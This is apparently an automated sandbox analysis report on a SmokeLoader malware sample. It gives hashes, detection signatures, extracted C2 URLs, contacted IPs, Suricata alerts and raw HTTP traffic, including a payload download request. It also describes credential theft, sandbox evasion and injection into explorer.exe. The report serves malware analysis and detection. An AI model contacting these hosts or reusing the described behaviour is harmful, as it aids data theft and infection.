Windows Analysis Report
OCYe9qcxiM.exe

Overview

General Information

Sample name:	OCYe9qcxiM.exe renamed because original name is a hash value
Original sample name:	2a6994149baff1e680719f89062bfcc7.exe
Analysis ID:	1522699
MD5:	2a6994149baff1e680719f89062bfcc7
SHA1:	62abd53b0db022f2d20cb7ba5e1f2373753ecba1
SHA256:	ce434bc783d75cceafbddd59dd3ed43d4bf1811e0344ba5fdc6958af146254e7
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the windows firewall

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Signatures

AV Detection

Found malware configuration

Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\hehcrfb

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: OCYe9qcxiM.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\fihcrfb	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hehcrfb	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: OCYe9qcxiM.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B636F0 CryptExportKey,CryptExportKey,	9_2_00007FF780B636F0
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,	9_2_00007FF780B63220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	11_2_00C33098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	11_2_00C33717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33E04 RtlCompareMemory,CryptUnprotectData,	11_2_00C33E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C311E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	11_2_00C311E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31198 CryptBinaryToStringA,CryptBinaryToStringA,	11_2_00C31198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	11_2_00C3123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31FCE CryptUnprotectData,RtlMoveMemory,	11_2_00C31FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C22404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	14_2_00C22404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C2245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	14_2_00C2245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C2263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	14_2_00C2263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD25A4 CryptBinaryToStringA,CryptBinaryToStringA,	16_2_00AD25A4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	16_2_00AD2799

Uses 32bit PE files

Source: OCYe9qcxiM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF780B6FB34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00C32B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00C31D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00C33ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00D330A8

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49711 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49706 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49708 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49714 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49707 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49712 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49713 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49709 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49710 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49721 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49719 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49716 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49734 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49731 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49717 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49715 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49735 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49722 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49728 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49730 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49720 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49733 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49718 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49729 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49723 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49724 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49737 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49751 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49753 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49754 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49732 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49756 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49760 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49755 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49752 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49758 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49725 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49736 -> 187.228.112.175:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49762 -> 109.121.204.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49738 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49738 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49739 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49740 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49741 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49749 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49763 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49739 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49740 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49747 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49763 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49744 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49749 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49746 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49741 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49759 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49747 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49759 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49757 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49757 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49748 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49748 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49743 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49744 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49750 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49745 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49743 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49750 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49746 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49742 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49742 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49745 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.8:49761 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.8:49761 -> 23.145.40.162:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.121.204.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 187.228.112.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 23.145.40.162 23.145.40.162

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: INTERNETGROUP-AS-BGBulgariaBG INTERNETGROUP-AS-BGBulgariaBG
Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.8:49738

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://mcjvrcrjrartnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://niarejwvgfav.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://lkfxgtbclffake.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://fyhvuoiqukrfjpjs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jmcgnnydyiyvfde.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://vjdyvxrsjwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://phwhrimonssxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://hqblemeoblb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: calvinandhalls.com
